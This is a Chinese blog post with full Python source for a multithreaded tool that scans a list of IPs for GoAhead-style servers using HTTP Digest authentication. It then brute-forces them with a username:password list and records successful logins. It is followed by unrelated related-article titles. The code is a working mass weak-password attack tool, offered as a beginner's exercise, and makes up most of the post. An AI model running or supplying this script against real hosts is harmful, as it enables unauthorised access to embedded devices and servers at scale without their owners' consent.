最近在学习用python写爬虫工具,某天偶然发现GoAhead系列服务器的登录方式跟大多数网站不一样,不是采用POST等方法,通过查找资料发现GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的嵌入式Web Server。大多数GoAhead服务器采用了HTTP Digest认证方式,并且部分服务器采用了默认账号密码,于是萌生了针对GoAhead编写爬虫的想法,通过近8个小时的编程与调试,勉强写出了个简陋的脚本,现在拿出来分享,给刚接触python的新手参考下,也请求路过的大神指点下,哈哈。

  该脚本对新手来说难点在于如何让python自动填写账号密码并登录,本人花了近两个小时参考了很多网站,觉得用python的第三方模块requests中的get()函数最方便,只需填写URL、认证方式和账号密码即可模拟登录。

  另一个难点就是多线程了,不过对于用其它语言写过多线程的人来说还是挺容易的,不懂的可以自己查资料,这里就不多说了。

  下面附上完整代码:

from requests.auth import HTTPDigestAuth

import requests

import threading

import sys

import os

import time

ip_file_name = 'ip.txt'

password_file_name = 'password.txt'

results_file_name = 'results.txt'

ip_count = 0

thread_count = 0

default_thread_count = 150

local = threading.local()

#read ip_file

def get_ip():

    if os.path.exists(os.getcwd() + '/' + ip_file_name):

        with open(ip_file_name, 'r') as r:

            list = []

            for line in r.readlines():

                line = line.strip('\n')

                line = 'http://' + line

                list.append(line)

            r.close()

            return list

    else:

        print('ip file doesn\'t exist!\n')

        os._exit(-1)

#read password_file

def get_password():

    if os.path.exists(os.getcwd() + '/' + password_file_name):

        with open(password_file_name, 'r') as pa:

            list = []

            for line in pa.readlines():

                line = line.strip('\n')

                list.append(line)

            pa.close()

        return list

    else:

        print('password file doesn\'t exist!\n')

        os._exit(-1)

class MyThread(threading.Thread):

    def __init__(self, thread_index, ip_list, pass_list, results_file):

        threading.Thread.__init__(self)

        self.thread_index = thread_index

        self.ip_list = ip_list

        self.pass_list = pass_list

        self.results_file = results_file

    def run(self):

        local.thread_index = self.thread_index

        #Calculate the number of tasks assigned.

        if ip_count <= default_thread_count:

            local.my_number = 1

        else:

            local.my_number = (int)(ip_count/thread_count)

            if ip_count%thread_count > thread_index:

                local.my_number = local.my_number + 1

        for local.times in range(local.my_number):

            try:

                local.ip = self.ip_list[(local.times-1)*thread_count+local.thread_index]

                #Check whether the target is a digest authentication.

                local.headers = str(requests.get(local.ip, timeout=6).headers)

                if 'Digest' not in local.headers:

                    continue

            except BaseException:

                '''

                e = sys.exc_info()

                print(e)

                '''

                continue

            #Loop to submit account password.

            for local.user in self.pass_list:

                #sleep 0.1 second to prevent overloading of target

                time.sleep(0.1)

                #Get the account password by cutting local.user

                local.colon_index = local.user.find(':')

                if local.colon_index == -1:

                    print(local.user+' doesn\'t Conform to the specifications')

                    os._exit(1)

                local.username = local.user[0:local.colon_index]

                local.password = local.user[local.colon_index+1:]

                if local.password == '<empty>':

                    local.password = ''

                try:

                    local.timeouts = 0

                    #Start Digest authentication

                    local.code = requests.get( local.ip, auth=HTTPDigestAuth(local.username, local.password), timeout=5 )

                    #If the status code is 200,the login is success

                    if local.code.status_code == 200 :

                        print('login '+local.ip+' success!')

                        self.results_file.writelines(local.ip+' '+local.username+' '+local.password+'\n')

                        break

                except BaseException:

                        '''

                        e = sys.exc_info()

                        print(str(local.thread_index)+' '+local.ip+' '+local.username+' '+local.password)

                        print(e)

                        '''

                        #If the times of timeout is too many, check the next IP.

                        local.timeouts += 1

                        if local.timeouts == 15:

                            local.timeouts = 0

                            break

                        else:

                            continue

if __name__ == '__main__':

    ip_list = get_ip()

    pass_list = get_password()

    if len(ip_list)==0 or len(pass_list)==0:

        print('please fill ip, username or password file')

        os._exit(-1)

    ip_count = len(ip_list)

    if ip_count <= default_thread_count:

        thread_count = ip_count

    else:

        thread_count = default_thread_count

    print('start to work...')

    #create threads and run

    threads = []

    with open(results_file_name, mode='a') as results_file:

        for thread_index in range(thread_count):

            thread = MyThread(thread_index, ip_list, pass_list, results_file)

            thread.start()

            threads.append(thread)

        for thread in threads:

            #wait for all threads to end

            thread.join()

        results_file.close()

    print('All work has been completed.')

  该脚本的运行流程为:

  1.读取ip.txt、password.txt文件中的内容

  2.创建线程并运行

  3.每个线程对其分配到的IP进行循环认证,先检查目标是否存在且为Digest认证方式,若为真则开始循环登录,登录过程中若多次超时则跳过对该IP的检查

  4.当服务器返回200状态码时则表示登录成功,将IP和账号密码写入results.txt,并循环检查下一个IP

  5.当所有线程将分配到的所有IP检查完毕,则程序运行完毕

批量检测GoAhead系列服务器中Digest认证方式的服务器弱口令的更多相关文章

  1. ssh 服务器之间公钥认证方式的配置

    前言 项目中需要编写脚本在服务器之间上传或者下载文件,但没有相关服务器来测试脚本,于是就着手安装两台server,然后用ssh的相关命令去配置server之间公钥认证登录. 步骤 1. 在VM Box ...

  2. cas sso单点登录系列3_cas-server端配置认证方式实践(数据源+自定义java类认证)

    转:http://blog.csdn.net/ae6623/article/details/8851801 本篇将讲解cas-server端的认证方式 1.最简单的认证,用户名和密码一致就登录成功 2 ...

  3. spark批量写写数据到Hbase中(bulkload方式)

    1:为什么大批量数据集写入Hbase中,需要使用bulkload BulkLoad不会写WAL,也不会产生flush以及split. 如果我们大量调用PUT接口插入数据,可能会导致大量的GC操作.除了 ...

  4. 基于Token的身份认证 与 基于服务器的身份认证

    基于Token的身份认证 与 基于服务器的身份认证 基于服务器的身份认证 在讨论基于Token的身份认证是如何工作的以及它的好处之前,我们先来看一下以前我们是怎么做的: HTTP协议是无状态的,也就是 ...

  5. Java 实现 SSH 协议的客户端登录认证方式--转载

    背景 在开篇之前,让我们先对 SSH 协议有个宏观的大致了解,这样更有利于我们对本文的加深了解.首先要提到的就是计算机网络协议,所谓计算机网络协议,简单的说就是定义了一套标准和规则,使得不同计算机之间 ...

  6. http认证方式,工程部分实现

    学习过程中,被boss批评,要求去复习http协议,因此找了相关资料做成一个系列:对于http认证方式不清楚的可以参考我的上一篇文章 http认证方式https://www.cnblogs.com/j ...

  7. getJSON方式请求服务器

    register.jsp <%@ page language="java" import="java.util.*" pageEncoding=" ...

  8. Python批量检测服务器端口可用性与Socket函数使用

    socket函数 简述 socket又称套间字或者插口,是网络通信中必不可少的工具.有道是:"无socket,不网络".由于socket最早在BSD Unix上使用,而Unix/L ...

  9. Linux利用nc命令脚本批量检测服务器指定端口是否开放

    一.nc命令检测端口的用法 # nc -v -w 10 %IP% -z %PORT% -v 显示指令执行过程. -w <超时秒数> 设置等待连线的时间. -u 表示使用UDP协议 -z 使 ...

随机推荐

  1. nodejs辅助前台开发系列(1) 搭建简单HTML开发环境

    搭建简单的html开发环境一般需要解决两个问题: 文本编辑器 WebServer集成 在文本编辑器选择上,VS Code 无疑是一匹黑马,谁用谁知道.WebServer集成nodejs对前端来说最为友 ...

  2. 关于Android SDK Manager更新速度慢的解决方法

    因为我的C盘比较小,android sdk安装在c盘那么他下载的东西也会默认在c盘.所以我选择安装在其他的盘.而且我发现android sdk manager可以开多个窗口,这样的话如果每个窗口都很慢 ...

  3. MapReduce浅析

    很早之前就用过Hadoop,但对MapReduce中的具体数据流向过程一直不甚明了,用Python Streamming的方式写了几个MapReduce,对这个过程有了一定的认识. 首先我们知道,Ma ...

  4. python第二篇博客,关于数据类型的详细讲解

    数据,就是我们要存储的信息,因为信心种类很多,所以,数据种类也有很多 数字类型数据 整数int 表示年龄,手机号等等 浮点型float 表示身高,工资等带有小数点的数据 字符串类型数据 用来做描述性信 ...

  5. JAVA:一篇文章理清多态

    很多人总是喜欢,或者说错误地将JAVA中的多态理解得很复杂,最常见的错误说法就是所谓"方法的多态",他们会给出类似下面的例子来佐证"多态是指方法的多态": // ...

  6. 用python进行应用程序自动化测试(uiautomation)

    本文主要用到一个uiautomation的开源框架,是一个咱们中国人写的,支持MFC,Windows Forms,WPF,Metro,Qt界面:此文主要是自己的个人总结,开源作者原文:http://w ...

  7. c++代码的编译

    1.gcc和g++     1.1搞清楚几个名字         GCC :GNU Compiler Collection (GUN编译套件),可以编译c,c++,java,objective-c,F ...

  8. javascript中词法环境、领域、执行上下文以及作业详解

    词法环境(Lexical Environments) 官方规范对词法环境的说明是:词法环境(Lexical Environments)是一种规范类型,用于根据ECMAScript代码的词法嵌套结构来定 ...

  9. 一、Android四大框架之ContentProvider的学习与运用,实现SQLite的增删改查。

    本文系原创博客,文中不妥烦请指出,如需转载摘要请注明出处! ContentProvider的学习与运用 Alpha Dog 2016-04-13  10:27:06 首先,项目的地址:https:// ...

  10. Oracle 12c(12.1.0.5)OEM server agent 安装配置

    注意: 此文档为生产上操作文档,省略了IP,oracle用户server,agent 端至少需要sudo,ping,ssh,创建目录权限. 一.安装要求 1.1. 系统情况一览 IP 数据库 OEM ...